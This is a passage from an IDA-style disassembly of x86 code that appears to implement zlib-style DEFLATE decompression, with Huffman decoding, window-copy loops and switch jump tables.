mov esi, [ebp+arg_4]
mov ecx, [ebp+var_C]
loc_49D502: ; CODE XREF: sub_49CC4B+8AC�j
mov eax, [ebp+arg_0]
push 1
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
mov [esi], edi
add [esi+8], eax
mov [ebx+34h], ecx
loc_49D522: ; CODE XREF: sub_49CC4B+720�j
; sub_49CC4B+772�j ...
push esi
jmp short loc_49D57A
; ---------------------------------------------------------------------------
loc_49D525: ; CODE XREF: sub_49CC4B+4B�j
; DATA XREF: _4:off_49D588�o
mov eax, [ebp+arg_0] ; jumptable 0049CC96 case 9
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
add [eax+8], edx
loc_49D546: ; CODE XREF: sub_49CC4B+687�j
; sub_49CC4B+7A2�j
mov ecx, [ebp+var_C]
push 0FFFFFFFDh
mov [ebx+34h], ecx
jmp short loc_49D579
; ---------------------------------------------------------------------------
loc_49D550: ; CODE XREF: sub_49CC4B+45�j
mov eax, [ebp+arg_0] ; default
mov ecx, [ebp+var_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
push 0FFFFFFFEh
mov [eax+4], ecx
mov ecx, [ebp+var_10]
mov edx, ecx
sub edx, [eax]
mov [eax], ecx
mov ecx, [ebp+var_C]
add [eax+8], edx
mov [ebx+34h], ecx
loc_49D579: ; CODE XREF: sub_49CC4B+74A�j
; sub_49CC4B+903�j
push eax
loc_49D57A: ; CODE XREF: sub_49CC4B+6B0�j
; sub_49CC4B+8D8�j
push ebx
call sub_49E8DE
add esp, 0Ch
loc_49D583: ; CODE XREF: sub_49CC4B+84E�j
pop edi
pop esi
pop ebx
leave
retn
sub_49CC4B endp
; ---------------------------------------------------------------------------
off_49D588 dd offset loc_49CC9D ; DATA XREF: sub_49CC4B+4B�r
dd offset loc_49CD7B ; jump table for switch statement
dd offset loc_49CDEE
dd offset loc_49CED8
dd offset loc_49CF70
dd offset loc_49D02E
dd offset loc_49D1FD
dd offset loc_49D4AF
dd offset loc_49D4F9
dd offset loc_49D525
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49D5B0 proc near ; CODE XREF: sub_49DF00+21�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
push 0
push esi
push edi
call sub_49CB53
push dword ptr [edi+28h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebp
retn
sub_49D5B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49D5E6 proc near ; CODE XREF: sub_49CC4B+E8�p
; sub_49CC4B+58C�p
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_10]
push 1Ch
push 1
push dword ptr [eax+28h]
call dword ptr [eax+20h]
add esp, 0Ch
test eax, eax
jz short loc_49D618
mov cl, [ebp+arg_0]
and dword ptr [eax], 0
mov [eax+10h], cl
mov cl, [ebp+arg_4]
mov [eax+11h], cl
mov ecx, [ebp+arg_8]
mov [eax+14h], ecx
mov ecx, [ebp+arg_C]
mov [eax+18h], ecx
loc_49D618: ; CODE XREF: sub_49D5E6+15�j
pop ebp
retn
sub_49D5E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49D61A proc near ; CODE XREF: sub_49CC4B+5DE�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
mov ebx, [edi+4]
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_49D652
sub eax, edx
dec eax
jmp short loc_49D657
; ---------------------------------------------------------------------------
loc_49D652: ; CODE XREF: sub_49D61A+31�j
mov eax, [edi+2Ch]
sub eax, edx
loc_49D657: ; CODE XREF: sub_49D61A+36�j
mov [ebp+var_C], eax
loc_49D65A: ; CODE XREF: sub_49D61A+E9�j
; sub_49D61A+16E�j ...
mov ecx, [ebx]
cmp ecx, 9 ; switch 10 cases
ja loc_49DB7E ; default
jmp ds:off_49DBB0[ecx*4] ; switch jump
loc_49D66C: ; DATA XREF: _4:off_49DBB0�o
cmp eax, 102h ; jumptable 0049D665 case 0
jb loc_49D708
cmp [ebp+var_8], 0Ah
jb loc_49D708
mov eax, [ebp+arg_4]
push esi
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
push edi
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
push dword ptr [ebx+18h]
movzx eax, byte ptr [ebx+11h]
push dword ptr [ebx+14h]
push eax
movzx eax, byte ptr [ebx+10h]
push eax
call sub_49DBEB
mov [ebp+arg_8], eax
mov eax, [esi]
mov [ebp+var_4], eax
mov eax, [esi+4]
mov edx, [edi+34h]
mov [ebp+var_8], eax
mov eax, [edi+20h]
add esp, 18h
mov [ebp+arg_4], eax
mov eax, [edi+1Ch]
mov [ebp+arg_0], eax
mov eax, [edi+30h]
cmp edx, eax
jnb short loc_49D6E5
sub eax, edx
dec eax
jmp short loc_49D6EA
; ---------------------------------------------------------------------------
loc_49D6E5: ; CODE XREF: sub_49D61A+C4�j
mov eax, [edi+2Ch]
sub eax, edx
loc_49D6EA: ; CODE XREF: sub_49D61A+C9�j
cmp [ebp+arg_8], 0
mov [ebp+var_C], eax
jz short loc_49D708
mov ecx, [ebp+arg_8]
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 7
mov [ebx], ecx
jmp loc_49D65A
; ---------------------------------------------------------------------------
loc_49D708: ; CODE XREF: sub_49D61A+57�j
; sub_49D61A+61�j ...
movzx eax, byte ptr [ebx+10h]
mov [ebx+0Ch], eax
mov eax, [ebx+14h]
mov [ebx+8], eax
mov dword ptr [ebx], 1
loc_49D71B: ; CODE XREF: sub_49D61A+4B�j
; sub_49D61A+12F�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 0049D665 case 1
cmp [ebp+arg_0], eax
jnb short loc_49D74B
cmp [ebp+var_8], 0
jz loc_49DA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_49D71B ; jumptable 0049D665 case 1
; ---------------------------------------------------------------------------
loc_49D74B: ; CODE XREF: sub_49D61A+107�j
mov eax, ds:dword_4A1318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test ecx, ecx
mov [ebp+var_18], ecx
jnz short loc_49D78D
mov eax, [eax+4]
mov dword ptr [ebx], 6
mov [ebx+8], eax
loc_49D785: ; CODE XREF: sub_49D61A+18D�j
; sub_49D61A+1A7�j ...
mov eax, [ebp+var_C]
jmp loc_49D65A
; ---------------------------------------------------------------------------
loc_49D78D: ; CODE XREF: sub_49D61A+15D�j
mov ecx, [ebp+var_18]
test cl, 10h
jz short loc_49D7A9
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+4], eax
mov dword ptr [ebx], 2
jmp short loc_49D785
; ---------------------------------------------------------------------------
loc_49D7A9: ; CODE XREF: sub_49D61A+179�j
test cl, 40h
jz loc_49D89A
test cl, 20h
jz loc_49DA9A
mov dword ptr [ebx], 7
jmp short loc_49D785
; ---------------------------------------------------------------------------
loc_49D7C3: ; CODE XREF: sub_49D61A+4B�j
; sub_49D61A+1D7�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 0049D665 case 2
cmp [ebp+arg_0], eax
jnb short loc_49D7F3
cmp [ebp+var_8], 0
jz loc_49DA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_49D7C3 ; jumptable 0049D665 case 2
; ---------------------------------------------------------------------------
loc_49D7F3: ; CODE XREF: sub_49D61A+1AF�j
mov eax, ds:dword_4A1318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 3
shr [ebp+arg_4], cl
add [ebx+4], eax
mov eax, ecx
sub [ebp+arg_0], eax
movzx eax, byte ptr [ebx+11h]
mov [ebx+0Ch], eax
mov eax, [ebx+18h]
mov [ebx+8], eax
loc_49D81E: ; CODE XREF: sub_49D61A+4B�j
; sub_49D61A+232�j
; DATA XREF: ...
mov eax, [ebx+0Ch] ; jumptable 0049D665 case 3
cmp [ebp+arg_0], eax
jnb short loc_49D84E
cmp [ebp+var_8], 0
jz loc_49DA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_49D81E ; jumptable 0049D665 case 3
; ---------------------------------------------------------------------------
loc_49D84E: ; CODE XREF: sub_49D61A+20A�j
mov eax, ds:dword_4A1318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
lea eax, [ecx+eax*8]
mov [ebp+var_14], eax
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax+1]
sub [ebp+arg_0], eax
mov eax, [ebp+var_14]
shr [ebp+arg_4], cl
movzx ecx, byte ptr [eax]
test cl, 10h
jz short loc_49D891
and ecx, 0Fh
mov [ebx+8], ecx
mov eax, [eax+4]
mov [ebx+0Ch], eax
mov dword ptr [ebx], 4
jmp loc_49D785
; ---------------------------------------------------------------------------
loc_49D891: ; CODE XREF: sub_49D61A+25E�j
test cl, 40h
jnz loc_49DACF
loc_49D89A: ; CODE XREF: sub_49D61A+192�j
mov [ebx+0Ch], ecx
mov ecx, [eax+4]
lea eax, [eax+ecx*8]
mov [ebx+8], eax
jmp loc_49D785
; ---------------------------------------------------------------------------
loc_49D8AB: ; CODE XREF: sub_49D61A+4B�j
; sub_49D61A+2BF�j
; DATA XREF: ...
mov eax, [ebx+8] ; jumptable 0049D665 case 4
cmp [ebp+arg_0], eax
jnb short loc_49D8DB
cmp [ebp+var_8], 0
jz loc_49DA88
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and [ebp+arg_8], 0
dec [ebp+var_8]
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_4], eax
inc [ebp+var_4]
add [ebp+arg_0], 8
jmp short loc_49D8AB ; jumptable 0049D665 case 4
; ---------------------------------------------------------------------------
loc_49D8DB: ; CODE XREF: sub_49D61A+297�j
mov eax, ds:dword_4A1318[eax*4]
mov ecx, [ebx+8]
and eax, [ebp+arg_4]
mov dword ptr [ebx], 5
shr [ebp+arg_4], cl
add [ebx+0Ch], eax
mov eax, ecx
sub [ebp+arg_0], eax
loc_49D8F9: ; CODE XREF: sub_49D61A+4B�j
; DATA XREF: _4:off_49DBB0�o
mov ecx, [edi+28h] ; jumptable 0049D665 case 5
mov eax, edx
sub eax, [ebx+0Ch]
cmp eax, ecx
mov [ebp+var_10], eax
jnb short loc_49D91E
mov eax, [edi+2Ch]
sub eax, ecx
mov [ebp+var_18], eax
loc_49D910: ; CODE XREF: sub_49D61A+302�j
mov eax, [ebp+var_10]
add eax, [ebp+var_18]
cmp eax, [edi+28h]
mov [ebp+var_10], eax
jb short loc_49D910
loc_49D91E: ; CODE XREF: sub_49D61A+2EC�j
cmp dword ptr [ebx+4], 0
mov eax, [ebp+var_C]
jz loc_49D9E3
loc_49D92B: ; CODE XREF: sub_49D61A+3C3�j
test eax, eax
jnz loc_49D9B9
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_49D95B
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_49D95B
mov edx, ecx
cmp edx, eax
jnb short loc_49D952
sub eax, edx
dec eax
jmp short loc_49D957
; ---------------------------------------------------------------------------
loc_49D952: ; CODE XREF: sub_49D61A+331�j
mov eax, [ebp+var_14]
sub eax, edx
loc_49D957: ; CODE XREF: sub_49D61A+336�j
test eax, eax
jnz short loc_49D9B9
loc_49D95B: ; CODE XREF: sub_49D61A+321�j
; sub_49D61A+32B�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_49E8DE
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_49D980
sub eax, edx
dec eax
jmp short loc_49D985
; ---------------------------------------------------------------------------
loc_49D980: ; CODE XREF: sub_49D61A+35F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_49D985: ; CODE XREF: sub_49D61A+364�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_49D9B1
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_49D9AE
mov edx, ecx
cmp edx, eax
jnb short loc_49D9A7
sub eax, edx
dec eax
jmp short loc_49D9B1
; ---------------------------------------------------------------------------
loc_49D9A7: ; CODE XREF: sub_49D61A+386�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_49D9B1
; ---------------------------------------------------------------------------
loc_49D9AE: ; CODE XREF: sub_49D61A+380�j
mov eax, [ebp+var_C]
loc_49D9B1: ; CODE XREF: sub_49D61A+376�j
; sub_49D61A+38B�j ...
test eax, eax
jz loc_49DADE
loc_49D9B9: ; CODE XREF: sub_49D61A+313�j
; sub_49D61A+33F�j
mov ecx, [ebp+var_10]
and [ebp+arg_8], 0
mov cl, [ecx]
mov [edx], cl
inc edx
inc [ebp+var_10]
dec eax
mov ecx, [ebp+var_10]
mov [ebp+var_C], eax
cmp ecx, [edi+2Ch]
jnz short loc_49D9DA
mov ecx, [edi+28h]
mov [ebp+var_10], ecx
loc_49D9DA: ; CODE XREF: sub_49D61A+3B8�j
dec dword ptr [ebx+4]
jnz loc_49D92B
loc_49D9E3: ; CODE XREF: sub_49D61A+30B�j
; sub_49D61A+469�j
and dword ptr [ebx], 0
jmp loc_49D65A
; ---------------------------------------------------------------------------
loc_49D9EB: ; CODE XREF: sub_49D61A+4B�j
; DATA XREF: _4:off_49DBB0�o
test eax, eax ; jumptable 0049D665 case 6
jnz loc_49DA75
mov eax, [edi+2Ch]
cmp edx, eax
mov [ebp+var_14], eax
jnz short loc_49DA1B
mov eax, [edi+30h]
mov ecx, [edi+28h]
cmp eax, ecx
jz short loc_49DA1B
mov edx, ecx
cmp edx, eax
jnb short loc_49DA12
sub eax, edx
dec eax
jmp short loc_49DA17
; ---------------------------------------------------------------------------
loc_49DA12: ; CODE XREF: sub_49D61A+3F1�j
mov eax, [ebp+var_14]
sub eax, edx
loc_49DA17: ; CODE XREF: sub_49D61A+3F6�j
test eax, eax
jnz short loc_49DA75
loc_49DA1B: ; CODE XREF: sub_49D61A+3E1�j
; sub_49D61A+3EB�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_49E8DE
mov edx, [edi+34h]
mov [ebp+arg_8], eax
mov eax, [edi+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_18], eax
jnb short loc_49DA40
sub eax, edx
dec eax
jmp short loc_49DA45
; ---------------------------------------------------------------------------
loc_49DA40: ; CODE XREF: sub_49D61A+41F�j
mov eax, [edi+2Ch]
sub eax, edx
loc_49DA45: ; CODE XREF: sub_49D61A+424�j
mov ecx, [edi+2Ch]
mov [ebp+var_C], eax
cmp edx, ecx
mov [ebp+var_14], ecx
jnz short loc_49DA71
mov ecx, [edi+28h]
mov eax, [ebp+var_18]
cmp eax, ecx
jz short loc_49DA6E
mov edx, ecx
cmp edx, eax
jnb short loc_49DA67
sub eax, edx
dec eax
jmp short loc_49DA71
; ---------------------------------------------------------------------------
loc_49DA67: ; CODE XREF: sub_49D61A+446�j
mov eax, [ebp+var_14]
sub eax, edx
jmp short loc_49DA71
; ---------------------------------------------------------------------------
loc_49DA6E: ; CODE XREF: sub_49D61A+440�j
mov eax, [ebp+var_C]
loc_49DA71: ; CODE XREF: sub_49D61A+436�j
; sub_49D61A+44B�j ...
test eax, eax
jz short loc_49DADE
loc_49DA75: ; CODE XREF: sub_49D61A+3D3�j
; sub_49D61A+3FF�j
mov cl, [ebx+8]
and [ebp+arg_8], 0
mov [edx], cl
inc edx
dec eax
mov [ebp+var_C], eax
jmp loc_49D9E3
; ---------------------------------------------------------------------------
loc_49DA88: ; CODE XREF: sub_49D61A+10D�j
; sub_49D61A+1B5�j ...
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
and dword ptr [esi+4], 0
jmp short loc_49DAF0
; ---------------------------------------------------------------------------
loc_49DA9A: ; CODE XREF: sub_49D61A+19B�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidLiteral ; "invalid literal/length code"
loc_49DAA7: ; CODE XREF: sub_49D61A+4B�j
; sub_49D61A+4C2�j
; DATA XREF: ...
mov eax, [ebp+arg_4] ; jumptable 0049D665 case 9
push 0FFFFFFFDh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_49DBA1
; ---------------------------------------------------------------------------
loc_49DACF: ; CODE XREF: sub_49D61A+27A�j
mov dword ptr [ebx], 9
mov dword ptr [esi+18h], offset aInvalidDistanc ; "invalid distance code"
jmp short loc_49DAA7 ; jumptable 0049D665 case 9
; ---------------------------------------------------------------------------
loc_49DADE: ; CODE XREF: sub_49D61A+399�j
; sub_49D61A+459�j
mov eax, [ebp+arg_4]
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
loc_49DAF0: ; CODE XREF: sub_49D61A+47E�j
mov eax, [ebp+var_4]
push [ebp+arg_8]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp loc_49DBA1
; ---------------------------------------------------------------------------
loc_49DB07: ; CODE XREF: sub_49D61A+4B�j
; DATA XREF: _4:off_49DBB0�o
cmp [ebp+arg_0], 7 ; jumptable 0049D665 case 7
jbe short loc_49DB17
sub [ebp+arg_0], 8
inc [ebp+var_8]
dec [ebp+var_4]
loc_49DB17: ; CODE XREF: sub_49D61A+4F1�j
push [ebp+arg_8]
mov [edi+34h], edx
push esi
push edi
call sub_49E8DE
mov edx, [edi+34h]
add esp, 0Ch
cmp [edi+30h], edx
jz short loc_49DB53
mov ecx, [ebp+arg_4]
push eax
mov [edi+20h], ecx
mov ecx, [ebp+arg_0]
mov [edi+1Ch], ecx
mov ecx, [ebp+var_8]
mov [esi+4], ecx
mov ecx, [ebp+var_4]
mov ebx, ecx
sub ebx, [esi]
mov [esi], ecx
add [esi+8], ebx
mov [edi+34h], edx
jmp short loc_49DBA1
; ---------------------------------------------------------------------------
loc_49DB53: ; CODE XREF: sub_49D61A+513�j
mov dword ptr [ebx], 8
loc_49DB59: ; CODE XREF: sub_49D61A+4B�j
; DATA XREF: _4:off_49DBB0�o
mov eax, [ebp+arg_4] ; jumptable 0049D665 case 8
push 1
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
jmp short loc_49DBA1
; ---------------------------------------------------------------------------
loc_49DB7E: ; CODE XREF: sub_49D61A+45�j
mov eax, [ebp+arg_4] ; default
push 0FFFFFFFEh
mov [edi+20h], eax
mov eax, [ebp+arg_0]
mov [edi+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, [ebp+var_4]
mov ecx, eax
sub ecx, [esi]
mov [esi], eax
add [esi+8], ecx
mov [edi+34h], edx
loc_49DBA1: ; CODE XREF: sub_49D61A+4B0�j
; sub_49D61A+4E8�j ...
push esi
push edi
call sub_49E8DE
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_49D61A endp
; ---------------------------------------------------------------------------
off_49DBB0 dd offset loc_49D66C ; DATA XREF: sub_49D61A+4B�r
dd offset loc_49D71B ; jump table for switch statement
dd offset loc_49D7C3
dd offset loc_49D81E
dd offset loc_49D8AB
dd offset loc_49D8F9
dd offset loc_49D9EB
dd offset loc_49DB07
dd offset loc_49DB59
dd offset loc_49DAA7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49DBD8 proc near ; CODE XREF: sub_49CB53+3A�p
; sub_49CC4B+5F7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push [ebp+arg_0]
mov eax, [ebp+arg_4]
push dword ptr [eax+28h]
call dword ptr [eax+24h]
pop ecx
pop ecx
pop ebp
retn
sub_49DBD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49DBEB proc near ; CODE XREF: sub_49D61A+9A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, [ebp+arg_14]
mov ecx, [esi+34h]
mov edx, [esi+1Ch]
mov eax, [edi]
mov [ebp+var_C], ecx
mov [ebp+var_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
mov eax, [esi+20h]
mov [ebp+arg_14], eax
mov eax, [esi+30h]
cmp ecx, eax
jnb short loc_49DC20
sub eax, ecx
dec eax
jmp short loc_49DC25
; ---------------------------------------------------------------------------
loc_49DC20: ; CODE XREF: sub_49DBEB+2E�j
mov eax, [esi+2Ch]
sub eax, ecx
loc_49DC25: ; CODE XREF: sub_49DBEB+33�j
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
mov eax, ds:dword_4A1318[eax*4]
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
mov eax, ds:dword_4A1318[eax*4]
mov [ebp+arg_4], eax
loc_49DC42: ; CODE XREF: sub_49DBEB+72�j
; sub_49DBEB+231�j
cmp edx, 14h
jnb short loc_49DC5F
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_49DC42
; ---------------------------------------------------------------------------
loc_49DC5F: ; CODE XREF: sub_49DBEB+5A�j
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_8]
and eax, [ebp+arg_14]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
loc_49DC73: ; CODE XREF: sub_49DBEB+C4�j
movzx ecx, byte ptr [eax+1]
jz loc_49DDF6
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
mov ecx, [ebp+arg_0]
test cl, 10h
jnz short loc_49DCB1
test cl, 40h
jnz loc_49DE56
mov ecx, ds:dword_4A1318[ecx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax]
mov [ebp+arg_0], ecx
test ecx, ecx
jmp short loc_49DC73
; ---------------------------------------------------------------------------
loc_49DCB1: ; CODE XREF: sub_49DBEB+A1�j
and ecx, 0Fh
mov esi, ds:dword_4A1318[ecx*4]
and esi, [ebp+arg_14]
shr [ebp+arg_14], cl
add esi, [eax+4]
sub edx, ecx
mov [ebp+arg_0], esi
loc_49DCC9: ; CODE XREF: sub_49DBEB+F9�j
cmp edx, 0Fh
jnb short loc_49DCE6
mov eax, [ebp+var_8]
dec [ebp+var_4]
mov ecx, edx
movzx eax, byte ptr [eax]
shl eax, cl
or [ebp+arg_14], eax
inc [ebp+var_8]
add edx, 8
jmp short loc_49DCC9
; ---------------------------------------------------------------------------
loc_49DCE6: ; CODE XREF: sub_49DBEB+E1�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_C]
and eax, [ebp+arg_14]
movzx ebx, byte ptr [ecx+eax*8]
lea eax, [ecx+eax*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
sub edx, ecx
loc_49DD03: ; CODE XREF: sub_49DBEB+146�j
test bl, 10h
jnz short loc_49DD33
test bl, 40h
jnz loc_49DE21
mov ecx, ds:dword_4A1318[ebx*4]
and ecx, [ebp+arg_14]
add ecx, [eax+4]
movzx ebx, byte ptr [eax+ecx*8]
lea eax, [eax+ecx*8]
movzx ecx, byte ptr [eax+1]
shr [ebp+arg_14], cl
mov [ebp+var_18], ecx
sub edx, ecx
jmp short loc_49DD03
; ---------------------------------------------------------------------------
loc_49DD33: ; CODE XREF: sub_49DBEB+11B�j
and ebx, 0Fh
loc_49DD36: ; CODE XREF: sub_49DBEB+165�j
cmp edx, ebx
jnb short loc_49DD52
mov ecx, [ebp+var_8]
dec [ebp+var_4]
movzx esi, byte ptr [ecx]
mov ecx, edx
shl esi, cl
or [ebp+arg_14], esi
inc [ebp+var_8]
add edx, 8
jmp short loc_49DD36
; ---------------------------------------------------------------------------
loc_49DD52: ; CODE XREF: sub_49DBEB+14D�j
mov esi, ds:dword_4A1318[ebx*4]
mov ecx, ebx
and esi, [ebp+arg_14]
sub edx, ebx
shr [ebp+arg_14], cl
add esi, [eax+4]
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
sub [ebp+var_10], eax
mov ebx, [ebp+arg_10]
mov eax, ecx
sub eax, esi
mov esi, [ebx+28h]
cmp eax, esi
jnb short loc_49DDD2
mov ebx, [ebx+2Ch]
mov [ebp+var_18], ebx
sub ebx, esi
loc_49DD85: ; CODE XREF: sub_49DBEB+19E�j
add eax, ebx
cmp eax, esi
jb short loc_49DD85
mov esi, [ebp+var_18]
sub esi, eax
cmp [ebp+arg_0], esi
jbe short loc_49DDB4
sub [ebp+arg_0], esi
loc_49DD98: ; CODE XREF: sub_49DBEB+1B4�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec esi
jnz short loc_49DD98
mov eax, [ebp+arg_10]
mov esi, [eax+28h]
loc_49DDA7: ; CODE XREF: sub_49DBEB+1C5�j
mov al, [esi]
mov [ecx], al
inc ecx
inc esi
dec [ebp+arg_0]
jnz short loc_49DDA7
jmp short loc_49DDEE
; ---------------------------------------------------------------------------
loc_49DDB4: ; CODE XREF: sub_49DBEB+1A8�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_49DDC5: ; CODE XREF: sub_49DBEB+1E3�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_49DDC5
jmp short loc_49DDEE
; ---------------------------------------------------------------------------
loc_49DDD2: ; CODE XREF: sub_49DBEB+190�j
mov bl, [eax]
mov [ecx], bl
mov bl, [eax+1]
inc ecx
inc eax
mov [ecx], bl
inc ecx
inc eax
sub [ebp+arg_0], 2
loc_49DDE3: ; CODE XREF: sub_49DBEB+201�j
mov bl, [eax]
mov [ecx], bl
inc ecx
inc eax
dec [ebp+arg_0]
jnz short loc_49DDE3
loc_49DDEE: ; CODE XREF: sub_49DBEB+1C7�j
; sub_49DBEB+1E5�j
mov esi, [ebp+arg_10]
mov [ebp+var_C], ecx
jmp short loc_49DE0D
; ---------------------------------------------------------------------------
loc_49DDF6: ; CODE XREF: sub_49DBEB+8C�j
shr [ebp+arg_14], cl
movzx ecx, byte ptr [eax+1]
mov al, [eax+4]
sub edx, ecx
mov ecx, [ebp+var_C]
inc [ebp+var_C]
